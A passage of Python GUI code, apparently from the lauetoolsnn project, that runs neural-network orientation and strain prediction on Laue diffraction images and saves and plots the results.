temp_key = list(wb.keys())
# # load json and create model
loaded_model_json = json_file.read()
json_file.close()
model = model_from_json(loaded_model_json)
print("Constructing model")
load_weights = self.filenameModel[0]
model.load_weights(load_weights)
print("Uploading weights to model")
print("All model files found and loaded")
cond = self.strain_plot_tech.currentText()
self.strain_calculation = False
if cond == "YES":
self.strain_calculation = True
## access grid files to process with multi-thread
check = np.zeros((1,int(self.ubmat.text())))
# =============================================================================
try:
blacklist = self.blacklist_file[0]
except:
blacklist = None
### Create a COR directory to be loaded in LaueTools
forma = filenameSingleExp.split(".")[1]
cor_file_directory = self.filenameDirec + "//" + self.experimental_prefix.text()+"CORfiles"
if forma in ['cor',"COR","Cor"]:
cor_file_directory = self.filenameDirec
if not os.path.exists(cor_file_directory):
os.makedirs(cor_file_directory)
mode_analysis = self.analysis_plot_tech.currentText()
start_time = time.time()
col = [[] for i in range(int(self.ubmat.text()))]
colx = [[] for i in range(int(self.ubmat.text()))]
coly = [[] for i in range(int(self.ubmat.text()))]
rotation_matrix = [[] for i in range(int(self.ubmat.text()))]
strain_matrix = [[] for i in range(int(self.ubmat.text()))]
strain_matrixs = [[] for i in range(int(self.ubmat.text()))]
match_rate = [[] for i in range(int(self.ubmat.text()))]
spots_len = [[] for i in range(int(self.ubmat.text()))]
iR_pix = [[] for i in range(int(self.ubmat.text()))]
fR_pix = [[] for i in range(int(self.ubmat.text()))]
mat_global = [[] for i in range(int(self.ubmat.text()))]
best_match = [[] for i in range(int(self.ubmat.text()))]
for i in range(int(self.ubmat.text())):
col[i].append(np.zeros((lim_x*lim_y,3)))
colx[i].append(np.zeros((lim_x*lim_y,3)))
coly[i].append(np.zeros((lim_x*lim_y,3)))
rotation_matrix[i].append(np.zeros((lim_x*lim_y,3,3)))
strain_matrix[i].append(np.zeros((lim_x*lim_y,3,3)))
strain_matrixs[i].append(np.zeros((lim_x*lim_y,3,3)))
match_rate[i].append(np.zeros((lim_x*lim_y,1)))
spots_len[i].append(np.zeros((lim_x*lim_y,1)))
iR_pix[i].append(np.zeros((lim_x*lim_y,1)))
fR_pix[i].append(np.zeros((lim_x*lim_y,1)))
mat_global[i].append(np.zeros((lim_x*lim_y,1)))
best_match[i].append([[] for jk in range(lim_x*lim_y)])
strain_matrix12, strain_matrixs12, \
rotation_matrix12, col12, \
colx12, coly12,\
match_rate12, mat_global12, cnt12,\
files_treated12, spots_len12, \
iR_pix12, fR_pix12, check12, \
best_match12, pred_hkl = predict_preprocessMP(filenameSingleExp, 0,
rotation_matrix,strain_matrix,strain_matrixs,
col,colx,coly,match_rate,spots_len,iR_pix,fR_pix,best_match,
mat_global,
check,self.detectorparameters,self.pixelsize,angbins,
classhkl, self.hkl_all_class0, self.hkl_all_class1, self.emin, self.emax,
self.material_, self.material1_, self.symmetry, self.symmetry1,lim_x,lim_y,
self.strain_calculation, ind_mat, ind_mat1,
model_direc, float(self.tolerance.text()), float(self.tolerance1.text()),
int(self.ubmat.text()), self.ccd_label.currentText(),
None,float(self.intensity_threshold.text()),
int(self.boxsize.text()),self.bkg_treatment.text(),
self.filenameDirec, self.experimental_prefix.text(),
blacklist, None,
[],False,
wb, temp_key, cor_file_directory, mode_analysis,
self.softmax_threshold_global,
self.mr_threshold_global,
self.cap_matchrate,
self.tolerance_strain,
self.tolerance_strain1,
self.NumberMaxofFits,
self.fit_peaks_gaussian_global,
self.FitPixelDev_global,
self.coeff,
self.coeff_overlap,
self.material0_limit,
self.material1_limit,
False,
self.material_phase_always_present,
self.crystal,
self.crystal1,
self.strain_free_parameters)
end_time = time.time() - start_time
print("Total time to process one file in "+mode_analysis+" mode (in seconds): "+str(end_time))
save_name = filenameSingleExp.split(".")[0].split("/")[-1]
np.savez_compressed(model_direc+'//'+save_name+"_"+mode_analysis+'.npz', strain_matrix12, strain_matrixs12, \
rotation_matrix12, col12, colx12, coly12, match_rate12, mat_global12, cnt12,\
files_treated12, spots_len12, iR_pix12, fR_pix12, check12, best_match12)
try:
path = os.path.normpath(filenameSingleExp)
files = cor_file_directory+"//"+path.split(os.sep)[-1].split(".")[0]+".cor"
allres = IOLT.readfile_cor(files, True)
data_theta, data_chi, peakx, peaky, intensity = allres[1:6]
CCDcalib = allres[-1]
detectorparameters = allres[-2]
# print('detectorparameters from file are: '+ str(detectorparameters))
pixelsize = CCDcalib['pixelsize']
CCDLabel = CCDcalib['CCDLabel']
framedim = dictLT.dict_CCD[CCDLabel][0]
dict_dp={}
dict_dp['kf_direction']='Z>0'
dict_dp['detectorparameters']=detectorparameters
dict_dp['detectordistance']=detectorparameters[0]
dict_dp['detectordiameter']=pixelsize*framedim[0]#TODO*2
dict_dp['pixelsize']=pixelsize
dict_dp['dim']=framedim
dict_dp['peakX']=peakx
dict_dp['peakY']=peaky
dict_dp['intensity']=intensity
except:
try:
allres = IOLT.readfile_cor(filenameSingleExp, True)
data_theta, data_chi, peakx, peaky, intensity = allres[1:6]
CCDcalib = allres[-1]
detectorparameters = allres[-2]
# print('detectorparameters from file are: '+ str(detectorparameters))
pixelsize = CCDcalib['pixelsize']
CCDLabel = CCDcalib['CCDLabel']
framedim = dictLT.dict_CCD[CCDLabel][0]
dict_dp={}
dict_dp['kf_direction']='Z>0'
dict_dp['detectorparameters']=detectorparameters
dict_dp['detectordistance']=detectorparameters[0]
dict_dp['detectordiameter']=pixelsize*framedim[0]#TODO*2
dict_dp['pixelsize']=pixelsize
dict_dp['dim']=framedim
dict_dp['peakX']=peakx
dict_dp['peakY']=peaky
dict_dp['intensity']=intensity
except:
print("No COR/ Exp. file could be found for the selected filename")
return
sim_twotheta1, sim_chi1, list_spots1, residues1, theo_index1 = [],[],[],[],[]
sim_energy1 = []
sim_hkl1 = []
for ijk in range(len(match_rate12)):
mat_global987 = mat_global12[ijk][0]
rotation_matrix987 = rotation_matrix12[ijk][0][0]
if mat_global987 == 1:
material_=self.material_
tolerance_add = float(self.tolerance.text())
elif mat_global987 == 2:
material_=self.material1_
tolerance_add = float(self.tolerance1.text())
else:
print("Matrix "+str(ijk+1)+" is not found")
material_ = None
tolerance_add = None
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
if np.all(rotation_matrix987==0):
material_ = None
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
print("No rotation matrix found")
if material_ != None:
sim_twotheta, sim_chi, sim_energy, sim_hkl,\
list_spots, residues, theo_index = simulate_spots(rotation_matrix987,
material_, self.emax, self.emin,
dict_dp['detectorparameters'], dict_dp,
tolerance_add, data_theta*2.0,
data_chi)
if len(sim_twotheta) == 0:
sim_twotheta = []
sim_chi = []
list_spots = []
residues = []
theo_index = []
sim_energy = []
sim_hkl = []
print("Nothing simulated")
sim_twotheta1.append(sim_twotheta)
sim_chi1.append(sim_chi)
list_spots1.append(list_spots)
residues1.append(residues)
theo_index1.append(theo_index)
sim_energy1.append(sim_energy)
sim_hkl1.append(sim_hkl)
w = MyPopup(match_rate12, rotation_matrix12, mat_global12, fR_pix12, \
filenameSingleExp, strain_matrix12, strain_matrixs12, end_time, mode_analysis,
data_theta, data_chi, intensity, sim_twotheta1, sim_chi1, sim_energy1, sim_hkl1,
list_spots1, residues1, theo_index1, pred_hkl)
# w.setGeometry(QRect(100, 100, 400, 200))
w.show()
self.popups.append(w)
#TODO cnt12 is 0 i.e. does not correspond to the image number
# cnt_mpdata = cnt12
# for i_mpdata in files_treated12:
# self.files_treated.append(i_mpdata)
# for intmat_mpdata in range(int(self.ubmat.text())):
# self.check[cnt_mpdata,intmat_mpdata] = check12[0,intmat_mpdata]
# self.mat_global[intmat_mpdata][0][cnt_mpdata] = mat_global12[intmat_mpdata][0][0]
# self.strain_matrix[intmat_mpdata][0][cnt_mpdata,:,:] = strain_matrix12[intmat_mpdata][0][0,:,:]
# self.strain_matrixs[intmat_mpdata][0][cnt_mpdata,:,:] = strain_matrixs12[intmat_mpdata][0][0,:,:]
# self.rotation_matrix[intmat_mpdata][0][cnt_mpdata,:,:] = rotation_matrix12[intmat_mpdata][0][0,:,:]
# self.col[intmat_mpdata][0][cnt_mpdata,:] = col12[intmat_mpdata][0][0,:]
# self.colx[intmat_mpdata][0][cnt_mpdata,:] = colx12[intmat_mpdata][0][0,:]
# self.coly[intmat_mpdata][0][cnt_mpdata,:] = coly12[intmat_mpdata][0][0,:]
# self.match_rate[intmat_mpdata][0][cnt_mpdata] = match_rate12[intmat_mpdata][0][0]
# self.spots_len[intmat_mpdata][0][cnt_mpdata] = spots_len12[intmat_mpdata][0][0]
# self.iR_pix[intmat_mpdata][0][cnt_mpdata] = iR_pix12[intmat_mpdata][0][0]
# self.fR_pix[intmat_mpdata][0][cnt_mpdata] = fR_pix12[intmat_mpdata][0][0]
# self.best_match[intmat_mpdata][0][cnt_mpdata] = best_match12[intmat_mpdata][0][0]
# self.update_plot()
def save_btn(self,):
curr_time = time.time()
now = datetime.datetime.fromtimestamp(curr_time)
c_time = now.strftime("%Y-%m-%d_%H-%M-%S")
save_directory_ = self.model_direc+"//results_"+self.material_+"_"+c_time
if not os.path.exists(save_directory_):
os.makedirs(save_directory_)
np.savez_compressed(save_directory_+ "//results.npz",
self.best_match, self.mat_global, self.rotation_matrix, self.strain_matrix,
self.strain_matrixs,
self.col, self.colx, self.coly, self.match_rate, self.files_treated,
self.lim_x, self.lim_y, self.spots_len, self.iR_pix, self.fR_pix,
self.material_, self.material1_)
## intermediate saving of pickle objects with results
with open(save_directory_+ "//results.pickle", "wb") as output_file:
cPickle.dump([self.best_match, self.mat_global, self.rotation_matrix, self.strain_matrix,
self.strain_matrixs,
self.col, self.colx, self.coly, self.match_rate, self.files_treated,
self.lim_x, self.lim_y, self.spots_len, self.iR_pix, self.fR_pix,
self.material_, self.material1_, self.lattice_, self.lattice1_,
self.symmetry, self.symmetry1, self.crystal, self.crystal1], output_file)
try:
## Write global text file with all results
if self.material_ != self.material1_:
text_file = open(save_directory_+"//prediction_stats_"+self.material_+"_"+self.material1_+".txt", "w")
else:
text_file = open(save_directory_+"//prediction_stats_"+self.material_+".txt", "w")
filenames = list(np.unique(self.files_treated))
filenames.sort(key=lambda var:[int(x) if x.isdigit() else x for x in re.findall(r'[^0-9]|[0-9]+', var)])
for i in range(self.lim_x*self.lim_y):
text_file.write("# ********** \n")
text_file.write("# Filename: "+ filenames[i] + "\n")
for j in range(len(self.best_match)):
stats_ = self.best_match[j][0][i]
dev_eps_sample = self.strain_matrixs[j][0][i,:,:]
dev_eps = self.strain_matrix[j][0][i,:,:]
initial_residue = self.iR_pix[j][0][i][0]
final_residue = self.fR_pix[j][0][i][0]
mat = int(self.mat_global[j][0][i][0])
if mat == 0:
case = "None"
elif mat == 1:
case = self.material_
elif mat == 2:
case = self.material1_
text_file.write("# ********** UB MATRIX "+str(j+1)+" \n")
text_file.write("Spot_index for 2 HKL are "+ str(stats_[0])+" ; "+ str(stats_[1])+ "\n")
text_file.write("HKL1 "+str(stats_[2])+"; HKL2 "+str(stats_[3])+"\n")
text_file.write("Coords of HKL1 "+str(stats_[4])+\
"; coords of HKL2 "+str(stats_[5])+"\n")
text_file.write("Distance between 2 spots is "+ str(stats_[6])+ "\n")
text_file.write("Distance between 2 spots in LUT is "+ str(stats_[7])+ "\n")
text_file.write("Accuracy of NN for 2 HKL is "+ str(stats_[8])+\
"% ; "+str(stats_[9])+ "% \n")
string1 = "Matched, Expected, Matching rate(%) : " + \
str(stats_[10]) +", "+str(stats_[11]) +", "+str(stats_[12])+" \n"
text_file.write(string1)
text_file.write("Rotation matrix for 2 HKL (multiplied by symmetry) is \n")
temp_ = stats_[14].flatten()
string1 = "[["+str(temp_[0])+","+str(temp_[1])+","+str(temp_[2])+"],"+ \
"["+str(temp_[3])+","+str(temp_[4])+","+str(temp_[5])+"],"+ \
"["+str(temp_[6])+","+str(temp_[7])+","+str(temp_[8])+"]]"+ " \n"
text_file.write(string1)
text_file.write("dev_eps_sample is \n")
temp_ = dev_eps_sample.flatten()
string1 = "[["+str(temp_[0])+","+str(temp_[1])+","+str(temp_[2])+"],"+ \
"["+str(temp_[3])+","+str(temp_[4])+","+str(temp_[5])+"],"+ \
"["+str(temp_[6])+","+str(temp_[7])+","+str(temp_[8])+"]]"+ " \n"
text_file.write(string1)
text_file.write("dev_eps is \n")
temp_ = dev_eps.flatten()
string1 = "[["+str(temp_[0])+","+str(temp_[1])+","+str(temp_[2])+"],"+ \
"["+str(temp_[3])+","+str(temp_[4])+","+str(temp_[5])+"],"+ \
"["+str(temp_[6])+","+str(temp_[7])+","+str(temp_[8])+"]]"+ " \n"
text_file.write(string1)
text_file.write("Initial_pixel, Final_pixel residues are : "+str(initial_residue)+", "+str(final_residue)+" \n")
text_file.write("Mat_id is "+str(mat)+"\n")
text_file.write("Material indexed is "+case+"\n")
text_file.write("\n")
text_file.close()
print("prediction statistics are generated")
except:
# text_file.close()
print("Errors with writing prediction output text file; could be the prediction was stopped midway")
try:
## write MTEX file
rotation_matrix = [[] for i in range(len(self.rotation_matrix))]
for i in range(len(self.rotation_matrix)):
rotation_matrix[i].append(np.zeros((self.lim_x*self.lim_y,3,3)))
for i in range(len(self.rotation_matrix)):
temp_mat = self.rotation_matrix[i][0]
for j in range(len(temp_mat)):
orientation_matrix = temp_mat[j,:,:]
## rotate orientation by 40degrees to bring in Sample RF
omega = np.deg2rad(-40)
# # rotation de -omega autour de l'axe x (or Y?) pour repasser dans Rsample
cw = np.cos(omega)
sw = np.sin(omega)
mat_from_lab_to_sample_frame = np.array([[cw, 0.0, sw], [0.0, 1.0, 0.0], [-sw, 0, cw]]) #Y
# mat_from_lab_to_sample_frame = np.array([[1.0, 0.0, 0.0], [0.0, cw, -sw], [0.0, sw, cw]]) #X
# mat_from_lab_to_sample_frame = np.array([[cw, -sw, 0.0], [sw, cw, 0.0], [0.0, 0.0, 1.0]]) #Z
orientation_matrix = np.dot(mat_from_lab_to_sample_frame.T, orientation_matrix)
if np.linalg.det(orientation_matrix) < 0:
orientation_matrix = -orientation_matrix
rotation_matrix[i][0][j,:,:] = orientation_matrix
if self.material_ == self.material1_:
lattice = self.lattice_
material0_LG = material0_lauegroup
header = [
"Channel Text File",
"Prj lauetoolsnn",
"Author [Ravi raj purohit]",
"JobMode Grid",
"XCells "+str(self.lim_x),
"YCells "+str(self.lim_y),
"XStep 1.0",
"YStep 1.0",
"AcqE1 0",
"AcqE2 0",
"AcqE3 0",
"Euler angles refer to Sample Coordinate system (CS0)! Mag 100 Coverage 100 Device 0 KV 15 TiltAngle 40 TiltAxis 0",
"Phases 1",
str(round(lattice._lengths[0]*10,5))+";"+str(round(lattice._lengths[1]*10,5))+";"+\
str(round(lattice._lengths[2]*10,5))+"\t"+str(round(lattice._angles[0],5))+";"+\
str(round(lattice._angles[1],5))+";"+str(round(lattice._angles[2],5))+"\t"+"Material1"+ "\t"+material0_LG+ "\t"+"????"+"\t"+"????",
"Phase X Y Bands Error Euler1 Euler2 Euler3 MAD BC BS"]
else:
lattice = self.lattice_
lattice1 = self.lattice1_
material0_LG = material0_lauegroup
material1_LG = material1_lauegroup
header = [
"Channel Text File",
"Prj lauetoolsnn",
"Author [Ravi raj purohit]",
"JobMode Grid",
"XCells "+str(self.lim_x),
"YCells "+str(self.lim_y),
"XStep 1.0",
"YStep 1.0",
"AcqE1 0",
"AcqE2 0",
"AcqE3 0",
"Euler angles refer to Sample Coordinate system (CS0)! Mag 100 Coverage 100 Device 0 KV 15 TiltAngle 40 TiltAxis 0",
"Phases 2",
str(round(lattice._lengths[0]*10,5))+";"+str(round(lattice._lengths[1]*10,5))+";"+\
str(round(lattice._lengths[2]*10,5))+"\t"+str(round(lattice._angles[0],5))+";"+\
str(round(lattice._angles[1],5))+";"+str(round(lattice._angles[2],5))+"\t"+"Material1"+ "\t"+material0_LG+ "\t"+"????"+"\t"+"????",
str(round(lattice1._lengths[0]*10,5))+";"+str(round(lattice1._lengths[1]*10,5))+";"+\
str(round(lattice1._lengths[2]*10,5))+"\t"+str(round(lattice1._angles[0],5))+";"+\
str(round(lattice1._angles[1],5))+";"+str(round(lattice1._angles[2],5))+"\t"+"Material2"+ "\t"+material1_LG+ "\t"+"????"+"\t"+"????",
"Phase X Y Bands Error Euler1 Euler2 Euler3 MAD BC BS"]
# =================CALCULATION OF POSITION=====================================
for index in range(len(self.rotation_matrix)):
euler_angles = np.zeros((len(rotation_matrix[index][0]),3))
phase_euler_angles = np.zeros(len(rotation_matrix[index][0]))
for i in range(len(rotation_matrix[index][0])):
if np.all(rotation_matrix[index][0][i,:,:] == 0):
continue
euler_angles[i,:] = OrientationMatrix2Euler(rotation_matrix[index][0][i,:,:])
phase_euler_angles[i] = self.mat_global[index][0][i]
euler_angles = euler_angles.reshape((self.lim_x,self.lim_y,3))
phase_euler_angles = phase_euler_angles.reshape((self.lim_x,self.lim_y,1))
a = euler_angles
if self.material_ != self.material1_:
filename125 = save_directory_+ "//"+self.material_+"_"+self.material1_+"_MTEX_UBmat_"+str(index)+"_LT.ctf"
else:
filename125 = save_directory_+ "//"+self.material_+"_MTEX_UBmat_"+str(index)+"_LT.ctf"
f = open(filename125, "w")
for ij in range(len(header)):
f.write(header[ij]+" \n")
for i123 in range(euler_angles.shape[1]):
y_step = 1 * i123
for j123 in range(euler_angles.shape[0]):
x_step = 1 * j123
phase_id = int(phase_euler_angles[j123,i123,0])
eul = str(phase_id)+'\t' + "%0.4f" % x_step +'\t'+"%0.4f" % y_step+'\t8\t0\t'+ \
"%0.4f" % a[j123,i123,0]+'\t'+"%0.4f" % a[j123,i123,1]+ \
'\t'+"%0.4f" % a[j123,i123,2]+'\t0.0001\t180\t0\n'
string = eul
f.write(string)
f.close()
except:
print("Error writing the MTEX file, could be the prediction data is not completed and save function was called")
#% Plot some data
try:
global_plots(self.lim_x, self.lim_y, self.rotation_matrix, self.strain_matrix, self.strain_matrixs,
self.col, self.colx, self.coly, self.match_rate, self.mat_global, self.spots_len,
self.iR_pix, self.fR_pix, save_directory_, self.material_, self.material1_,
match_rate_threshold=5, bins=30)
except:
print("Error in the global plots module")
# try:
# save_sst(self.lim_x, self.lim_y, self.strain_matrix, self.strain_matrixs, self.col,
# self.colx, self.coly, self.match_rate, self.mat_global, self.spots_len,
# self.iR_pix, self.fR_pix, save_directory_, self.material_, self.material1_,
# self.lattice_, self.lattice1_, self.symmetry, self.symmetry1, self.crystal, self.crystal1,
# self.rotation_matrix, self.symmetry_name, self.symmetry1_name,
# mac_axis = [0., 0., 1.], axis_text="Z", match_rate_threshold=5)
# except:
# print("Error in the SST plots module")
## HKL selective plots (in development)
hkls_list = ast.literal_eval(self.hkl_plot.text())
if self.ipf_axis.currentText() == "Z":
mac_axis = [0., 0., 1.]
elif self.ipf_axis.currentText() == "Y":
mac_axis = [0., 1., 0.]
elif self.ipf_axis.currentText() == "X":
mac_axis = [1., 0., 0.]
print(mac_axis, hkls_list)
# save_hkl_stats(self.lim_x, self.lim_y, self.strain_matrix, self.strain_matrixs, self.col,
# self.colx, self.coly, self.match_rate, self.mat_global, self.spots_len,
# self.iR_pix, self.fR_pix, save_directory_, self.material_, self.material1_,
# self.lattice_, self.lattice1_, self.symmetry, self.symmetry1, self.rotation_matrix,
# hkls_list=hkls_list, angle=10., mac_axis = mac_axis, axis_text = self.ipf_axis.currentText())
def plot_pc(self):
## update matrix plot box?
if self.matrix_plot.count() < int(self.ubmat.text()):
for intmat in range(int(self.ubmat.text())):
if intmat == 0 or intmat < self.matrix_plot.count():
continue
self.matrix_plot.addItem(str(intmat+1))
self.modify_array()
self.btn_config.setEnabled(False)
self.model_direc = self.modelDirec
## load model related files and generate the model
if self.material_ != self.material1_:
json_file = open(self.model_direc+"//model_"+self.material_+"_"+self.material1_+".json", 'r')
else:
json_file = open(self.model_direc+"//model_"+self.material_+".json", 'r')
self.classhkl = np.load(self.model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_0"]
self.angbins = np.load(self.model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_1"]
if self.material_ != self.material1_:
self.ind_mat = np.load(self.model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_5"]
self.ind_mat1 = np.load(self.model_direc+"//MOD_grain_classhkl_angbin.npz")["arr_6"]
else:
self.ind_mat = None
self.ind_mat1 = None
load_weights = self.filenameModel[0]
self.wb = read_hdf5(load_weights)
self.temp_key = list(self.wb.keys())
# # load json and create model
loaded_model_json = json_file.read()
json_file.close()
self.model = model_from_json(loaded_model_json)
load_weights = self.filenameModel[0]
self.model.load_weights(load_weights)
if self.file_state==0:
ct = time.time()
now = datetime.datetime.fromtimestamp(ct)
self.c_time = now.strftime("%Y-%m-%d_%H-%M-%S")
self.file_state = 1
self.initialize_plot()
self.mode_spotCycle = self.analysis_plot_tech.currentText()
if self.matrix_plot_tech.currentText() == "MultiProcessing":
self.ncpu = cpu_count_user
self._inputs_queue = Queue()
self._outputs_queue = Queue()
run_flag = multip.Value('I', True)
self._worker_processes = {}
for i in range(self.ncpu):
self._worker_processes[i]= Process(target=worker, args=(self._inputs_queue, self._outputs_queue, i+1, run_flag))#, mp_rotation_matrix))
for i in range(self.ncpu):
self._worker_processes[i].start()
### Update data from multiprocessing
self.timermp1212.setInterval(500) ## check every second (update the list of files in folder)
self.timermp1212.timeout.connect(self.update_data_mp1212)
self.timermp1212.start()
self.out_name = None
self.run = True
self.temp_ = threading.Thread(target=self.plot_pcv1, daemon=False)
self.temp_.start()
self.btn_stop.setEnabled(True)
self.btn_save.setEnabled(False)
def update_plot(self):
index_plotfnc = int(self.matrix_plot.currentText())-1
if self.ipf_axis.currentText() == "Z":
col_plot_plotfnc = self.col[index_plotfnc][0]
elif self.ipf_axis.currentText() == "Y":
col_plot_plotfnc = self.coly[index_plotfnc][0]
elif self.ipf_axis.currentText() == "X":
col_plot_plotfnc = self.colx[index_plotfnc][0]
col_plot_plotfnc = col_plot_plotfnc.reshape((self.lim_x, self.lim_y, 3))
mr_plot_plotfnc = self.match_rate[index_plotfnc][0]
mr_plot_plotfnc = mr_plot_plotfnc.reshape((self.lim_x, self.lim_y))
mat_glob_plotfnc = self.mat_global[index_plotfnc][0]
mat_glob_plotfnc = mat_glob_plotfnc.reshape((self.lim_x, self.lim_y))
self.im_axes.set_data(col_plot_plotfnc)
self.im_axes1.set_data(mr_plot_plotfnc)
if self.im_axes3 != None:
self.im_axes3.set_data(mat_glob_plotfnc)
strain_index_plotfnc = self.strain_plot.currentText()
if "sample" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = self.strain_matrixs[index_plotfnc][0]
elif "crystal" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = self.strain_matrix[index_plotfnc][0]
if "11" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,0,0]
elif "22" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,1,1]
elif "33" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,2,2]
elif "12" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,0,1]
elif "13" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,0,2]
elif "23" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,1,2]
strain_tensor_plot_plotfnc = strain_matrix_plot_plotfnc.reshape((self.lim_x, self.lim_y))
self.im_axes2.set_data(strain_tensor_plot_plotfnc)
self.canvas.draw()
def initialize_plot(self):
## get color matrix to plot
index_plotfnc = int(self.matrix_plot.currentText())-1
strain_index_plotfnc = self.strain_plot.currentText()
if "sample" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = self.strain_matrixs[index_plotfnc][0]
elif "crystal" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = self.strain_matrix[index_plotfnc][0]
if "11" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,0,0]
elif "22" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,1,1]
elif "33" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,2,2]
elif "12" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,0,1]
elif "13" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,0,2]
elif "23" in strain_index_plotfnc:
strain_matrix_plot_plotfnc = strain_matrix_plot_plotfnc[:,1,2]
try:
strain_tensor_plot_plotfnc = strain_matrix_plot_plotfnc.reshape((self.lim_x, self.lim_y))
except:
print("Reshape error, verify the grid xlim and ylim and change them")
return
if self.ipf_axis.currentText() == "Z":
col_plot_plotfnc = self.col[index_plotfnc][0]
elif self.ipf_axis.currentText() == "Y":
col_plot_plotfnc = self.coly[index_plotfnc][0]
elif self.ipf_axis.currentText() == "X":
col_plot_plotfnc = self.colx[index_plotfnc][0]
col_plot_plotfnc = col_plot_plotfnc.reshape((self.lim_x, self.lim_y, 3))
mr_plot_plotfnc = self.match_rate[index_plotfnc][0]
mr_plot_plotfnc = mr_plot_plotfnc.reshape((self.lim_x, self.lim_y))
mat_glob_plotfnc = self.mat_global[index_plotfnc][0]
mat_glob_plotfnc = mat_glob_plotfnc.reshape((self.lim_x, self.lim_y))
# Drop off the first y element, append a new one.
self.canvas.axes.cla()
self.canvas.axes.set_title("IPF map (rectangle selector)", loc='center', fontsize=10)
self.im_axes = self.canvas.axes.imshow(col_plot_plotfnc, origin='lower')
self.canvas.axes1.cla()
self.canvas.axes1.set_title("Matching rate (line selector)", loc='center', fontsize=10)
self.im_axes1 = self.canvas.axes1.imshow(mr_plot_plotfnc, origin='lower', cmap="jet", vmin=0, vmax=100)
self.canvas.axes2.cla()
self.canvas.axes2.set_title("Deviatoric strain", loc='center', fontsize=10)
self.im_axes2 = self.canvas.axes2.imshow(strain_tensor_plot_plotfnc, origin='lower', cmap="jet", vmin=-1, vmax=1)
if self.material_ != self.material1_:
self.canvas.axes3.cla()
self.canvas.axes3.set_title("Material Index (1: "+self.material_+"; 2: "+self.material1_+")", loc='center', fontsize=10)
self.im_axes3 = self.canvas.axes3.imshow(mat_glob_plotfnc, origin='lower', vmin=0, vmax=2)
else:
self.im_axes3 = None
toggle_selector.RS = RectangleSelector(self.canvas.axes, self.box_select_callback,
drawtype='box', useblit=True,
button=[1], # don't use middle/right button
minspanx=5, minspany=5,
spancoords='pixels',
interactive=True)
toggle_selector1.RS = RectangleSelector(self.canvas.axes1, self.line_select_callback,
drawtype='line', useblit=True,
button=[1], # don't use middle/right button
minspanx=5, minspany=5,
spancoords='pixels',
interactive=True)
# Trigger the canvas to update and redraw.
self.canvas.draw()
def line_select_callback(self, eclick, erelease):
'eclick and erelease are the press and release events'
if eclick.button == 1 and erelease.button == 1:
x1, y1 = int(np.round(eclick.xdata)), int(np.round(eclick.ydata))
x2, y2 = int(np.round(erelease.xdata)), int(np.round(erelease.ydata))
print("(%3.2f, %3.2f) --> (%3.2f, %3.2f)" % (x1, y1, x2, y2))
# print(" The button you used were: %s %s" % (eclick.button, erelease.button))
try:
index_plotfnc = int(self.matrix_plot.currentText())-1
title_plotfnc = "Deviatoric strain (crystal frame)"
strain_matrix_plot_plotfnc = self.strain_matrix[index_plotfnc][0]
try:
strain_tensor_plot_plotfnc = strain_matrix_plot_plotfnc.reshape((self.lim_x, self.lim_y,3,3))
num = int(np.hypot(x2-x1, y2-y1)) #np.max((abs(x2-x1),abs(y2-y1)))
x, y = np.linspace(x1, x2, num), np.linspace(y1, y2, num)
# Extract the values along the line
strain_tensor_cropped = strain_tensor_plot_plotfnc[y.astype(int), x.astype(int),:,:]
except:
print("Reshape error, verify the grid xlim and ylim and change them")
return
except:
print("No stats could be generated for the selected range of pixels")
return
w = MyPopup_image_v2(strain_tensor_cropped, title_plotfnc, flag=1)
w.show()
self.popups.append(w)
def box_select_callback(self, eclick, erelease):
'eclick and erelease are the press and release events'
if eclick.button == 1 and erelease.button == 1:
x1, y1 = int(np.round(eclick.xdata)), int(np.round(eclick.ydata))
x2, y2 = int(np.round(erelease.xdata)), int(np.round(erelease.ydata))
print("(%3.2f, %3.2f) --> (%3.2f, %3.2f)" % (x1, y1, x2, y2))
# print(" The button you used were: %s %s" % (eclick.button, erelease.button))
try:
index_plotfnc = int(self.matrix_plot.currentText())-1
title_plotfnc = "Deviatoric strain (crystal frame)"
strain_matrix_plot_plotfnc = self.strain_matrix[index_plotfnc][0]
try:
strain_tensor_plot_plotfnc = strain_matrix_plot_plotfnc.reshape((self.lim_x, self.lim_y,3,3))
except:
print("Reshape error, verify the grid xlim and ylim and change them")
return
except:
print("No stats could be generated for the selected range of pixels")
return
## crop the strain array with the coordinates of the rectangle
strain_tensor_cropped = strain_tensor_plot_plotfnc[y1:y2,x1:x2,:,:]
w = MyPopup_image_v2(strain_tensor_cropped, title_plotfnc)
w.show()
self.popups.append(w)
def onclickImage(self, event123):
if event123.dblclick or event123.button == 2:
ix, iy = event123.xdata, event123.ydata
try:
## read the saved COR file and extract exp spots info.## avoid zero index problem
ix = int(round(ix))
iy = int(round(iy))
try:
if iy == 0 and ix == 0:
image_no = 0
elif iy == 0 and ix != 0:
image_no = ix
elif iy != 0 and ix == 0:
image_no = iy * self.lim_y
elif iy != 0 and ix != 0:
image_no = iy * self.lim_y + ix
ccd_label = self.ccd_label.currentText()
path = os.path.normpath(self.filenm[image_no].decode())
Data, framedim, fliprot = IOimage.readCCDimage(path,
stackimageindex=-1,
CCDLabel=ccd_label,
dirname=None,
verbose=0)
except:
print(path)
